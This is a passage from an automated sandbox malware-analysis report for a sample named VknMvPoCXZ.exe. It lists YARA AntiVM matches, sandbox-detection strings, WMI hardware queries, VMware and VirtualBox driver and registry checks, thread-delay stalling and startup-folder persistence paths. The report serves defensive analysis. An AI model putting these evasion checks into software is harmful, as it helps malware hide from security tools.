                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.3.VknMvPoCXZ.exe.3ba8c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3ef0098.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.3.481F404B.exe.4430a90.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.27.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.37d17e0.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.7380000.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.VknMvPoCXZ.exe.6bd0000.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.VknMvPoCXZ.exe.37d17e0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.3.svchost.exe.3d58c40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 40.2.svchost.exe.3fa14c0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.505699283.0000000006BD0000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.373601058.00000000037D1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.583823180.0000000003FA1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000028.00000002.588230224.0000000007380000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: VknMvPoCXZ.exe PID: 2244, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 481F404B.exe PID: 6392, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5532, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4496, type: MEMORYSTR
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: VknMvPoCXZ.exe, 00000001.00000000.402866730.00000000026E1000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.567470983.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                      Source: VknMvPoCXZ.exe, 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, 481F404B.exe, 00000018.00000003.373977104.00000000043BA000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.380174976.0000000003CE2000.00000004.00000001.sdmp, svchost.exe, 00000028.00000002.583413395.0000000003EF0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\System32\svchost.exe TID: 6036Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6296Thread sleep time: -14757395258967632s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5168Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep count: 3116 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6560Thread sleep time: -20291418481080494s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6932Thread sleep count: 109 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6348Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep count: 1460 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6672Thread sleep time: -15679732462653109s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536Thread sleep count: 1154 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6628Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 1756 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7008Thread sleep time: -18446744073709540s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688Thread sleep count: 204 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep count: 1958 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6280Thread sleep count: 62 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2876Thread sleep count: 2068 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep count: 106 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6824Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4304Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6696Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6700Thread sleep count: 4209 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6700Thread sleep count: 3142 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6696Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3337
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3116
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1460
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1154
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1756
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1958
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2068
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 4209
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 3142
                      Source: C:\Users\user\Desktop\VknMvPoCXZ.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
                      Source: C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
